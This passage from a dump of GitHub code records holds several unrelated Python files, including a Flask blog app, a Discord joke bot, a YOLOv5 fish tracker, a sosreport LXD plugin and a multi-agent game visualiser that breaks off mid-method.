'/categories_list/'+cate_key+\"/\"+sub_cate)\n\n\n@app.route('/tags_list//')\ndef tags_list(tag_key, sub_tag):\n content = list()\n for item in db_tool.tags_index[tag_key][sub_tag]:\n content.append(db_tool.get_item_html(item['article_id'], item['title'], item['date']))\n return paging_html(content, \"标签:\"+tag_key + \" > \" + sub_tag,\n '/tags_list/'+tag_key+'/'+sub_tag)\n\n\n@app.route(\"/images/\")\ndef index(image_id):\n image = open(\"images/{}.svg\".format(image_id))\n resp = flask.Response(image, mimetype=\"image/svg+xml\")\n return resp\n\n\nif __name__ == \"__main__\":\n app.run('0.0.0.0', 80)\n","repo_name":"cador/flask_blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10723226832","text":"import requests\n\n\nasync def tell_joke(self, message):\n if \"joke\" in message.content:\n joke = requests.get(\n \"https://official-joke-api.appspot.com/random_joke\")\n json = joke.json()\n text = f\"**{json['setup']}**\"\n message = await message.channel.send(text)\n self.punchlines[message.id] = json[\"punchline\"]\n\n await message.add_reaction(\"❓\")\n\n return True\n\n return False\n\n\nasync def tell_punchline(self, message):\n if message.id in self.punchlines:\n punchline = self.punchlines[message.id]\n del self.punchlines[message.id]\n message = await message.channel.send(punchline)\n\n for emoji in [\"🤬\", \"😕\", \"😐\", \"🤣\", \"🤪\"]:\n await message.add_reaction(emoji)\n","repo_name":"womogenes/kiddos-bot","sub_path":"Client/_jokes.py","file_name":"_jokes.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33625843737","text":"import sqlite3 \nimport csv\nimport time\n\nDB_FILE=\"../northpoint.db\"\n\ndb = sqlite3.connect(DB_FILE) \nc = db.cursor() \n# change total_stories to number stories you want in db\ntotal_stories = 20\n\nc.execute(\"CREATE TABLE IF NOT EXISTS stories (story_id INTEGER, name TEXT, edit TEXT, editor TEXT, timestamp INTEGER)\")\n\nwith open('../data/stories.csv') as file:\n list = csv.reader(file)\n for row in list:\n if total_stories == 0:\n break\n info = [int(row[0]), row[1], row[2], row[3], int(time.time())]\n c.execute(\"INSERT INTO stories VALUES(?,?,?,?,?)\", info)\n total_stories -= 1\n \ndb.commit()\ndb.close()","repo_name":"weiwenzhou/Northpoint","sub_path":"util/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"8232553235","text":"# encoding: utf-8\n\"\"\"\n@author: Liurunzhi\n@time: 2021/8/13 10:29\n@Describe:鱼的跟踪检测,拿到跟踪框的坐标\n\"\"\"\nimport sys\n\nsys.path.insert(0, './yolov5')\n\nfrom yolov5.utils.google_utils import attempt_download\nfrom yolov5.models.experimental import attempt_load\nfrom yolov5.utils.datasets import LoadImages\nfrom yolov5.utils.general import check_img_size, non_max_suppression, scale_coords\nfrom yolov5.utils.torch_utils import select_device, time_synchronized\nfrom deep_sort_pytorch.utils.parser import get_config\nfrom deep_sort_pytorch.deep_sort import DeepSort\nimport time\nimport cv2\nimport torch\nimport os\nimport numpy as np\nfrom yolov5.utils.augmentations import letterbox\n\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\npalette = (2 ** 11 - 1, 2 ** 15 - 1, 2 ** 20 - 1)\n\n\ndef xyxy_to_xywh(*xyxy):\n \"\"\"\" Calculates the relative bounding box from absolute pixel values. \"\"\"\n bbox_left = min([xyxy[0].item(), xyxy[2].item()])\n bbox_top = min([xyxy[1].item(), xyxy[3].item()])\n bbox_w = abs(xyxy[0].item() - xyxy[2].item())\n bbox_h = abs(xyxy[1].item() - xyxy[3].item())\n x_c = (bbox_left + bbox_w / 2)\n y_c = (bbox_top + bbox_h / 2)\n w = bbox_w\n h = bbox_h\n return x_c, y_c, w, h\n\n\ndef xyxy_to_tlwh(bbox_xyxy):\n tlwh_bboxs = []\n for i, box in enumerate(bbox_xyxy):\n x1, y1, x2, y2 = [int(i) for i in box]\n top = x1\n left = y1\n w = int(x2 - x1)\n h = int(y2 - y1)\n tlwh_obj = [top, left, w, h]\n tlwh_bboxs.append(tlwh_obj)\n return tlwh_bboxs\n\n\ndef compute_color_for_labels(label):\n \"\"\"\n Simple function that adds fixed color depending on the class\n \"\"\"\n color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]\n return tuple(color)\n\n\ndef draw_boxes(img, bbox, identities=None, offset=(0, 0)):\n for i, box in enumerate(bbox):\n x1, y1, x2, y2 = [int(i) for i in box]\n x1 += offset[0]\n x2 += offset[0]\n y1 += offset[1]\n y2 += offset[1]\n # box text and bar\n id = int(identities[i]) if identities is not None else 0\n color = compute_color_for_labels(id)\n label = '{}{:d}'.format(\"\", id)\n t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2, 2)[0]\n cv2.rectangle(img, (x1, y1), (x2, y2), color, 2)\n # cv2.rectangle(img, (x1, y1), (x1 + t_size[0] + 3, y1 + t_size[1] + 4), color, -1)\n cv2.rectangle(img, (x1, y1 - t_size[1]), (x1 + t_size[0], y1), color, -1)\n # cv2.putText(img, label, (x1, y1 + t_size[1] + 4), cv2.FONT_HERSHEY_PLAIN, 2, [255, 255, 255], 1)\n cv2.putText(img, label, (x1 + 4, y1 - 2), cv2.FONT_HERSHEY_PLAIN, 1, [255, 255, 255], 2)\n return img\n\n\ndef detect(opt):\n yolo_weights, deep_sort_weights, imgsz, evaluate, coordinates, device = \\\n opt.yolo_weights, opt.deep_sort_weights, opt.img_size, opt.evaluate, opt.coordinates, opt.device\n # initialize deepsort\n cfg = get_config()\n cfg.merge_from_file(opt.config_deepsort)\n attempt_download(deep_sort_weights, repo='mikel-brostrom/Yolov5_DeepSort_Pytorch')\n deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT,\n max_dist=cfg.DEEPSORT.MAX_DIST, min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE,\n nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP,\n max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,\n max_age=cfg.DEEPSORT.MAX_AGE, n_init=cfg.DEEPSORT.N_INIT, nn_budget=cfg.DEEPSORT.NN_BUDGET,\n use_cuda=True)\n # Initialize\n device = select_device(opt.device)\n half = device.type != 'cpu' # half precision only supported on CUDA\n # Load model\n model = attempt_load(yolo_weights, map_location=device) # load FP32 model\n stride = int(model.stride.max()) # model stride\n imgsz = check_img_size(imgsz, s=stride) # check img_size\n # names = model.module.names if hasattr(model, 'module') else model.names # get class names\n if half:\n model.half() # to FP16\n # Set Dataloader\n # dataset = LoadImages(source, img_size=imgsz)\n # Get names and colors\n # names = model.module.names if hasattr(model, 'module') else model.names\n # Run inference\n if device.type != 'cpu':\n model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once\n t0 = time.time()\n # for frame_idx, (path, img, im0s, vid_cap) in enumerate(dataset):\n cap = cv2.VideoCapture(r\"/home/lrz/Documents/Codes/yolov5_deepsort_test/video/Oculus_20210804_160601.mp4\")\n while 1:\n ret, img0 = cap.read()\n if img0 is None:\n break\n img = letterbox(img0, 640, stride=32)[0]\n # Convert\n img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB\n img = np.ascontiguousarray(img)\n img = torch.from_numpy(img).to(device)\n img = img.half() if half else img.float() # uint8 to fp16/32\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n # Inference\n # t1 = time_synchronized()\n pred = model(img, augment=opt.augment)[0]\n # Apply NMS\n pred = non_max_suppression(\n pred, opt.conf_thres, opt.iou_thres, classes=opt.classes, agnostic=opt.agnostic_nms)\n # t2 = time_synchronized()\n # Process detections\n for i, det in enumerate(pred): # detections per image\n if det is not None and len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], img0.shape).round()\n xywh_bboxs = []\n confs = [] # 是鱼的概率\n # Adapt detections to deep sort input format\n for *xyxy, conf, cls in det:\n # to deep sort format\n x_c, y_c, bbox_w, bbox_h = xyxy_to_xywh(*xyxy)\n xywh_obj = [x_c, y_c, bbox_w, bbox_h]\n xywh_bboxs.append(xywh_obj)\n confs.append([conf.item()])\n xywhs = torch.Tensor(xywh_bboxs)\n confss = torch.Tensor(confs)\n # pass detections to deepsort\n outputs = deepsort.update(xywhs, confss, img0)\n # draw boxes for visualization\n if len(outputs) > 0:\n bbox_xyxy = outputs[:, :4]\n coordinates.append(bbox_xyxy)\n else:\n deepsort.increment_ages()\n cap.release()\n return coordinates\n","repo_name":"liurunsmileliu/yolov5_deepsort_fish","sub_path":"fish_track.py","file_name":"fish_track.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"13653102207","text":"# Facturacion en la compra de productos: \nimport math\n\nHAMB_POLLO = 5500\nHAMB_CARNE = 7400\nHAMB_PESCADO = 6000\nGASEOSA = 2200\nIVA = 0.19\n\nmenu = 0\nacumulador_hpollo = 0\nacumulador_hcarne = 0\nacumulador_hpescado = 0\nacumulador_gaseosa = 0\ntotal_gaseosa = 0\ntotal_hamburguesa_pollo = 0\ntotal_hamburguesa_carne = 0\ntotal_hamburgesa_pescado = 0\n\nwhile(menu != 5):\n\n menu = \"\"\"\n \\n***** BIENVENIDOS A LA HAMBURGUESERIA *****\\n\n 1. Hamburguesa de pollo\n 2. Hamburguesa de carne\n 3. Hamburguesa de pescado\n 4. Gaseosa\n 5. Salir\n\n \\nElige una opcion: \"\"\"\n \n opcion = int(input(menu))\n\n if opcion == 1:\n cantidad_hamburguesa_pollo = int(input('Cuantas hamburguesas de pollo desea: '))\n total_hamburguesa_pollo = HAMB_POLLO * cantidad_hamburguesa_pollo\n acumulador_hpollo += cantidad_hamburguesa_pollo\n\n elif opcion == 2:\n cantidad_hamburguesa_carne = int(\n input('Cuantas hamburguesas de carne desea: '))\n total_hamburguesa_carne = HAMB_CARNE * cantidad_hamburguesa_carne\n acumulador_hcarne += cantidad_hamburguesa_carne\n\n elif opcion == 3:\n cantidad_hamburguesa_pescado = int(\n input(' Cuantas hamburguesas de pescado desea: '))\n total_hamburgesa_pescado = HAMB_PESCADO * cantidad_hamburguesa_pescado\n acumulador_hpescado += cantidad_hamburguesa_pescado\n\n elif opcion == 4:\n cantidad_gaseosa = int(input('Cuantas gaseosas desea: '))\n total_gaseosa = GASEOSA * cantidad_gaseosa\n acumulador_gaseosa += cantidad_gaseosa\n\n else:\n print('GRACIAS POR SU COMPRA')\n break\n\nvalor_neto = total_hamburguesa_pollo + total_hamburguesa_carne + total_hamburgesa_pescado + total_gaseosa\ncon_iva = (valor_neto * IVA) # .ceil redondea hacia arriba\ntotal_pagar = math.ceil(valor_neto + con_iva)\n\nif(valor_neto >= 2200):\n print('\\n--- Usted compro lo siguiente: ---')\n print('************************************')\n if(acumulador_hpollo >= 1):\n print(f'{acumulador_hpollo} Hamburguesas de pollo a $ 5500 c/u = {total_hamburguesa_pollo}')\n\n if(acumulador_hcarne >= 1): \n print(f'{acumulador_hcarne} Hamburguesas de carne a $ 7400 c/u = {total_hamburguesa_carne}')\n\n if(acumulador_hpescado >= 1):\n print(f'{acumulador_hpescado} Hamburguesas de pescado a $ 6000 c/u = {total_hamburgesa_pescado}')\n\n if(acumulador_gaseosa >= 1):\n print(f'{acumulador_gaseosa} Gaseosas a $ 2200 c/u = {total_gaseosa}')\n\n print(f'\\nSubtotal: $ {valor_neto}')\n print(f'IVA: $ {con_iva}')\n print(f'Total a pagar: $ {total_pagar}'.upper())\n\n paga = int(input('\\nCancela con efectivo: $ '))\n cambio = paga - total_pagar\n\n print(f'Su cambio es: $ {round(cambio)}\\n')\n\nelse:\n print('No escogio ninguna opción')\n","repo_name":"yoma75/ejercicios-de-python","sub_path":"numeros/hamburgeseria.py","file_name":"hamburgeseria.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"18915627216","text":"from sos.report.plugins import Plugin, UbuntuPlugin, SoSPredicate\n\n\nclass LXD(Plugin, UbuntuPlugin):\n\n short_desc = 'LXD container hypervisor'\n plugin_name = 'lxd'\n profiles = ('container',)\n packages = ('lxd',)\n commands = ('lxc', 'lxd',)\n\n def setup(self):\n\n lxd_kmods = [\n 'bpfilter',\n 'ebtable_filter',\n 'ebtables',\n 'ip6table_filter',\n 'ip6table_mangle',\n 'ip6table_nat',\n 'ip6table_raw',\n 'ip6_tables',\n 'iptable_filter',\n 'iptable_mangle',\n 'iptable_nat',\n 'iptable_raw',\n 'nf_nat',\n 'nf_tables',\n ]\n\n lxd_pred = SoSPredicate(self, kmods=lxd_kmods,\n required={'kmods': 'all'})\n\n lxd_pkg = self.policy.package_manager.pkg_by_name('lxd')\n if lxd_pkg and lxd_pkg['pkg_manager'] == 'snap':\n self.add_cmd_output(\"lxd.buginfo\", pred=lxd_pred)\n\n self.add_copy_spec([\n '/var/snap/lxd/common/config',\n '/var/snap/lxd/common/global-conf',\n '/var/snap/lxd/common/lxc/local.conf',\n '/var/snap/lxd/common/lxd/logs/*/*.conf',\n ])\n\n if not self.get_option(\"all_logs\"):\n self.add_copy_spec([\n '/var/snap/lxd/common/lxd/logs/*.log',\n '/var/snap/lxd/common/lxd/logs/*/*.log',\n ])\n else:\n self.add_copy_spec([\n '/var/snap/lxd/common/lxd/logs/**',\n ])\n else:\n self.add_copy_spec([\n \"/etc/default/lxd-bridge\",\n \"/var/log/lxd/*\"\n ])\n\n self.add_cmd_output([\n \"lxc image list\",\n \"lxc list\",\n \"lxc network list\",\n \"lxc profile list\",\n \"lxc storage list\"\n ], pred=lxd_pred)\n\n self.add_cmd_output([\n \"find /var/lib/lxd -maxdepth 2 -type d -ls\",\n ], suggest_filename='var-lxd-dirs.txt')\n\n# vim: set et ts=4 sw=4 :\n","repo_name":"sosreport/sos","sub_path":"sos/report/plugins/lxd.py","file_name":"lxd.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":470,"dataset":"github-code","pt":"7"} +{"seq_id":"38687557562","text":"import os.path\n\n# the projects root directory.\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n# the time (in seconds) between each tich of the ambience emitter.\nEMITTER_TICK = 1\n\n# file extensions allowed for upload.\nAUDIO_UPLOAD_EXTENSIONS = ['.ogg', '.mp3', '.wav']\nIMAGE_UPLOAD_EXTENSIONS = ['.jpg', '.png', '.gif']\n","repo_name":"wintermute-cell/ambimancer","sub_path":"definitions.py","file_name":"definitions.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43237342917","text":"#!/usr/bin/env python3\n# -*- coding : utf-8 -*-\n\nimport sys\nimport select\nimport time\nfrom matplotlib import pyplot as plt\nimport matplotlib.animation as animation\n\ndef datafeed(delta=10):\n last_draw = 0\n xdata = []\n ydata = []\n \n while True:\n i, o, e = select.select([sys.stdin], [], [], 1)\n \n if i:\n line = sys.stdin.readline()\n if line:\n line = line\n sys.stdout.write(line)\n data = [float(a.strip()) for a in line.strip().split(\",\")]\n xdata.append(data[0])\n ydata.append(data[1:])\n\n if time.time() - last_draw > delta:\n last_draw = time.time()\n yield xdata, ydata\n else:\n yield xdata, ydata\n break\n\ndef main():\n line = sys.stdin.readline()\n sys.stdout.write(line)\n\n headers = [a.strip() for a in line.strip().split(\",\")]\n\n fig, ax = plt.subplots()\n ax.set_xlabel(headers[0])\n \n\n for xdata, ydata in datafeed():\n plt.cla()\n plt.plot(xdata, ydata)\n plt.legend(labels=headers[1:])\n plt.xlabel(headers[0])\n plt.show(block=False)\n plt.show()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"LucasSeguinot/m2-sv3","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16658023286","text":"import os\nimport pickle\nimport argparse\nimport itertools\nfrom tqdm import tqdm\nfrom datetime import datetime\n\nimport numpy as np\n\nimport colorsys\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.patches as patches\nfrom matplotlib.textpath import TextPath\nfrom matplotlib.font_manager import FontProperties\nimport imageio\n\nfrom GameLogic import Game, Point\n\ncustom_preamble = {\n \"text.usetex\": True,\n \"text.latex.preamble\": [\n r\"\\usepackage{amsmath}\", # for the align enivironment\n ],\n}\nplt.rcParams.update(custom_preamble)\nmpl.use('TkAgg')\n\n\ndef print_maps(maps, fill='\\u2590\\u2588\\u258C'):\n \"\"\"\n Print one or multiple maps to console (Developer Tool)\n :param maps: (boolean) numpy array with shape [maps_count, size_x, size_y]\n :param fill: Define 3 characters for a true value (optional. default: 1/2 right block + 1 block + 1/2 left block)\n :return:\n \"\"\"\n if maps.ndim == 2:\n maps = np.expand_dims(maps, 0)\n\n if maps.ndim != 3:\n raise ValueError('Invalid number of dimensions')\n\n print('\\u250f' + '\\u2501' * (maps.shape[2] * 3) + '\\u2513')\n for i, layer in enumerate(maps):\n if i > 0:\n print('\\u2523' + '\\u2501' * (maps.shape[2] * 3) + '\\u252B')\n for row in layer:\n print('\\u2503', end='')\n for cell in row:\n if cell:\n print(fill, end='')\n else:\n print(' ', end='')\n print('\\u2503')\n print('\\u2517' + '\\u2501' * (maps.shape[2] * 3) + '\\u251B')\n\n\ndef fig_to_data(fig):\n \"\"\"\n Convert a whole matplotlib figure to numpy array of pixels\n :param fig: matplotlib figure\n :return: numpy array with shape [height, width, 3] (3 for RGB)\n \"\"\"\n fig.canvas.draw()\n w, h = fig.canvas.get_width_height()\n\n buf = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n buf.shape = (h, w, 3)\n\n buf = np.roll(buf, 3, axis=2)\n return buf\n\n\nclass Visualisation:\n def __init__(self, input_maps, map_size, agent_count, view_padding, view_reduced=False,\n truth_obstacles=None, dt='', i_game=None, scores=None, reached=None):\n self._map_size_x = map_size[0]\n self._map_size_y = map_size[1]\n self._view_padding = view_padding\n self._view_size_x = view_padding[0] + 1 + view_padding[1] if view_reduced else 0\n self._view_size_y = view_padding[2] + 1 + view_padding[3] if view_reduced else 0\n self._view_reduced = view_reduced\n self._agent_count = agent_count\n self.time_steps = len(input_maps)\n self._next_step = False\n self._dt = datetime.now().strftime('%Y-%m-%d-%H-%M-%S') if dt == '' else dt\n self._i_game = i_game\n self._scores = scores\n self._reached = reached\n\n # Modify given input_map for further usage\n input_maps = np.array(input_maps)\n if not view_reduced:\n # If field of view for agents is not reduced just force input_maps to the right shape\n # and set full_maps equal to it because input maps are the full maps\n self._input_maps = np.reshape(input_maps,\n (self.time_steps, agent_count, self._map_size_x, self._map_size_y))\n self._full_maps = self._input_maps\n else:\n # Separate the local field of view maps and global current and aim positions\n self._input_maps = np.reshape(input_maps[:, :, 0:self._view_size_x * self._view_size_y],\n (self.time_steps, agent_count, self._view_size_x, self._view_size_y))\n self._current_pos = (input_maps[:, :, -4:-2] * map_size).round().astype('int64')\n self._aim_pos = (input_maps[:, :, -2:] * map_size).round().astype('int64')\n if np.unique(self._current_pos, axis=0).shape[0] > 1:\n Warning('Warning: Aim positions changed over time')\n\n # Create full maps of the environment and start with a empty matrix\n # The size of a single map is padded to apply agents field of view also if a agent stands close to a corner\n # Shape: (time_steps, agent_counts, X, Y)\n self._full_maps = np.zeros((self.time_steps,\n self._agent_count,\n view_padding[0] + self._map_size_x + view_padding[1],\n view_padding[2] + self._map_size_y + view_padding[3]))\n\n # Create a list of indices of all cells in full_maps to put input_maps into it at the right positions later\n # Shape: (4, time_steps * agent_counts * map_size_x * map_size_y)\n indices = np.array(list(itertools.product(np.arange(self.time_steps),\n np.arange(agent_count),\n np.arange(self._view_size_x),\n np.arange(self._view_size_y)))).T\n\n # Add current agents positions as offset to indices to bring the smaller input_maps to the right positions\n indices[2] += np.repeat(self._current_pos[:, :, 0], self._view_size_x * self._view_size_y) # x offset\n indices[3] += np.repeat(self._current_pos[:, :, 1], self._view_size_x * self._view_size_y) # y offset\n\n # Fill the full maps with values from the input maps at the previously desired positions\n self._full_maps[indices[0], indices[1], indices[2], indices[3]] = self._input_maps.flatten()\n\n # Crop out the padding of the full maps\n self._full_maps = self._full_maps[:, :, view_padding[2]:-view_padding[3], view_padding[0]:-view_padding[1]]\n\n # Obstacles\n self._obstacle_maps = (self._full_maps == 0.25)\n if not np.all(np.isin(np.count_nonzero(self._obstacle_maps, axis=(0, 1)), [0, self.time_steps * agent_count])):\n Warning('Warning: Positions of obstacles changed over time or are different for different agents')\n if isinstance(truth_obstacles, type(None)):\n self._obstacle_pos = np.argwhere(np.any(self._obstacle_maps, axis=(0, 1)))\n else:\n if len(truth_obstacles) > 0:\n self._obstacle_pos = np.unique(truth_obstacles, axis=0)\n else:\n self._obstacle_pos = np.array([], dtype='int64')\n\n # Others Position\n self._others_maps = (self._full_maps == 0.5)\n\n # Aim Positions\n self._aim_maps = (self._full_maps == 0.75)\n if not np.all(np.isin(np.count_nonzero(self._aim_maps, axis=0), [0, self.time_steps])):\n Warning('Warning: Aim maps changed over time')\n\n # Current Positions\n self._current_maps = (self._full_maps == 1.0)\n if np.any(np.count_nonzero(self._current_maps, axis=(2, 3)) > 1):\n Warning('Warning: At least one time step there are several positions for one or more agents')\n elif np.any(np.count_nonzero(self._current_maps, axis=(2, 3)) < 1):\n Warning('Warning: At least at one time step for one or more agents the positions are missing')\n\n # # Agent status includes 'aim achieved' (a), 'self inflicted accident' (s), 'third-party fault accident' (3)\n # # and 'time out' (t) # TODO: Agent status\n # self._agents_conditions = np.zeros(self._agent_count, dtype=np.dtype('U1'))\n\n # Color\n self._color_hue_offset = np.random.uniform()\n\n def get_maps_for_agent(self, time_step=-1, agent=0, plot_input=False):\n \"\"\"\n Return the map for agent X's point of view including: obstacles, own aim position,\n own current position (, own next position), others current position (, others next position).\n :param time_step:\n :param agent: id number of agent\n :param plot_input:\n :return: map as boolean array with shape [4 or 6, size_x, size_y]\n \"\"\"\n obstacles = self._obstacle_maps[time_step, agent]\n aim_map = self._aim_maps[time_step, agent]\n cur_map = self._current_maps[time_step, agent]\n # nxt_map = ... TODO: Next step\n others_cp = self._others_maps[time_step, agent]\n full_map = self._full_maps[time_step, agent]\n input_map = self._input_maps[time_step, agent]\n\n # If field of view reduced add global positions to reduced input map\n if self._view_reduced:\n # get global positions, concatenate it to a vector and add a white border above\n # -> size = [2, 4]\n c_pos = self._current_pos[time_step, agent] / [self._map_size_x, self._map_size_y]\n a_pos = self._aim_pos[time_step, agent] / [self._map_size_x, self._map_size_y]\n positions = np.concatenate([c_pos, a_pos]).reshape(1, -1)\n positions = np.concatenate([np.ones((1, positions.shape[1])), positions], axis=0)\n\n # duplicate each pixel in input_map and positions to force divisibility by two\n input_map = input_map.repeat(2, axis=0).repeat(2, axis=1)\n positions = positions.repeat(2, axis=0).repeat(2, axis=1)\n\n # align centered both\n size_diff = input_map.shape[1] - positions.shape[1]\n if size_diff < 0: # position vector is longer than input_map width\n # add placeholder left and right to input_map\n input_map = np.concatenate([np.ones((input_map.shape[0], int(-0.5 * size_diff))),\n input_map,\n np.ones((input_map.shape[0], int(-0.5 * size_diff)))], axis=1)\n elif size_diff > 0: # position vector is shorter than input_map width\n # add placeholder left and right to positions\n positions = np.concatenate([np.ones((4, int(0.5 * size_diff))),\n positions,\n np.ones((4, int(0.5 * size_diff)))], axis=1)\n\n # now concatenate both\n input_map = np.concatenate([input_map, positions], axis=0)\n\n # make shape of input_map quadratic\n size_diff = input_map.shape[0] - positions.shape[1]\n if size_diff < 0: # concatenated input_map is wider than high\n input_map = np.concatenate([np.ones((int(-0.5 * size_diff), input_map.shape[1])),\n input_map,\n np.ones((int(-0.5 * size_diff), input_map.shape[1]))], axis=0)\n elif size_diff > 0: # concatenated input_map is higher than wide\n input_map = np.concatenate([np.ones((input_map.shape[0], int(0.5 * size_diff))),\n input_map,\n np.ones((input_map.shape[0], int(0.5 * size_diff)))], axis=1)\n\n if plot_input:\n agent_map = [obstacles, aim_map, cur_map, others_cp, full_map, input_map] # TODO: Next step\n else:\n agent_map = [obstacles, aim_map, cur_map, others_cp] # TODO: Next step\n\n # TODO: Next step\n # if self._next_step:\n # others_np = np.any(self.get_filtered_map(layer='n'), axis=0) # next positions of other agents\n # others_np = others_np & ~self.get_filtered_map(agent=agent, layer='n') # subtract own next position\n # agent_map = np.concatenate((agent_map, others_np))\n\n return agent_map\n\n def _get_plot_color(self, agent, next_step=False):\n \"\"\"\n Return color for a agents\n :param agent: id number of agent\n :param next_step:\n :return: rgb value\n \"\"\"\n hue = agent / self._agent_count + self._color_hue_offset\n saturation = 1.0 if not next_step else 0.1\n value = 0.7 if not next_step else 0.9\n return colorsys.hsv_to_rgb(hue, saturation, value)\n\n def _plot_map_border(self, ax):\n \"\"\"\n Plot a black border around a map\n :param ax: matplotlib axis / subplot\n :return:\n \"\"\"\n border = patches.Rectangle((0, 0), self._map_size_y, self._map_size_x, linewidth=5, edgecolor='black',\n facecolor='none')\n ax.add_patch(border)\n\n def _plot_view_border(self, ax, pos):\n \"\"\"\n Plot a grey border to visualize field of view of an agent\n :param ax: matplotlib axis / subplot\n :param pos: middle position of field (position of an agent)\n :return:\n \"\"\"\n start = (pos[1] - self._view_padding[1],\n self._map_size_x - pos[0] - 1 - self._view_padding[3])\n border = patches.Rectangle(start, self._view_size_y, self._view_size_x, linewidth=2, edgecolor='grey',\n facecolor='none')\n ax.add_patch(border)\n\n def _plot_rect_at_pos(self, ax, x, y, color):\n \"\"\"\n Plot a rectangle to symbolize an agent or abstacle\n :param ax: matplotlib axis / subplot\n :param x: x position\n :param y: y position\n :param color: color of rectangle\n :return:\n \"\"\"\n rect = patches.Rectangle((y, self._map_size_x - x - 1), 1, 1, linewidth=0,\n edgecolor='none', facecolor=color)\n ax.add_patch(rect)\n\n def _plot_label(self, ax, x, y, text, color):\n \"\"\"\n Plot a text label\n :param ax: matplotlib axis / subplot\n :param x: x position\n :param y: y position\n :param text: text\n :param color: color of text\n :return:\n \"\"\"\n x = self._map_size_x - x - 1\n prop = FontProperties(family='monospace', weight='black')\n tp = TextPath((y, x), text, prop=prop, size=1)\n polygon = tp.to_polygons()\n for a in polygon:\n patch = patches.Polygon(a, facecolor=color, edgecolor='black', linewidth=1, zorder=10)\n ax.add_patch(patch)\n\n def _plot_map(self, ax, map, color, plot_view_filed=False, curr_pos=None):\n \"\"\"\n Plot a boolean map\n :param ax: matplotlib axis / subplot\n :param map: boolean numpy map\n :param color: color of true blocks in boolean map\n :param plot_view_filed: if true, a grey border shows the field of view of an agent\n :param curr_pos: position of agent to plot view field border at the right position\n :return:\n \"\"\"\n # Plot map\n for x in range(self._map_size_x):\n for y in range(self._map_size_y):\n if map[x, y]:\n self._plot_rect_at_pos(ax, x, y, color)\n\n # Plot view field\n if plot_view_filed:\n self._plot_view_border(ax, curr_pos)\n\n # Plot border\n self._plot_map_border(ax)\n\n ax.set_ylim(0, self._map_size_x)\n ax.set_xlim(0, self._map_size_y)\n ax.set_aspect('equal')\n ax.set_xticks([])\n ax.set_yticks([])\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n\n def _plot_heatmap(self, ax, map):\n \"\"\"\n Plot a heatmap\n :param ax: matplotlib axis / subplot\n :param map: map to plot\n :return:\n \"\"\"\n ax.imshow(map, cmap='hot', interpolation='nearest', vmin=0, vmax=1)\n\n # ax.set_ylim(0, self._size_x)\n # ax.set_xlim(0, self._size_y)\n ax.set_aspect('equal')\n ax.set_xticks([])\n ax.set_yticks([])\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n\n def _plot_info(self, ax, time_step):\n \"\"\"\n Plot a text field with information about number of current game, time step, sizes of map of field of view\n :param ax: matplotlib axis / subplot\n :param time_step: number of time step\n :return:\n \"\"\"\n text = r'\\begin{align*}'\n if not isinstance(self._i_game, type(None)):\n text += r'i_{{game}}&={}\\\\'.format(self._i_game)\n text += r't&={}\\\\'.format(time_step)\n text += r'size_{{map}}&=\\left[{}\\times{}\\right]\\\\'.format(self._map_size_x, self._map_size_y)\n if self._view_reduced:\n text += r'size_{{view}}&=\\left[{}\\times{}\\right]\\\\'.format(self._view_size_x, self._view_size_y)\n text += r'\\end{align*}'\n\n ax.text(0.3, 1.0, text, fontsize=17, ha='left', va='top')\n\n ax.set_xlim(0, 1)\n ax.set_ylim(0, 1)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n\n def _plot_overview(self, fig, outer_grid=None, time_step=-1, plot_agent_status=True, plot_path=True,\n plot_input=False, plot_info=False, title=''):\n \"\"\"\n Plot a map all agents are included\n :param fig: matplotlib figure\n :param outer_grid: none or matplotlib grid this map should be plotted in\n :param time_step: time step to be plotted\n :param plot_agent_status: plot agents status (not implemented yet)\n :param plot_path: plot a line from start via each step to the current position\n :param plot_input: unused parameter. Just here to make list of parameters equal to _plot_all()\n :param plot_info: plot some information below the map\n :param title: title of plot\n :return: matplotlib figure\n 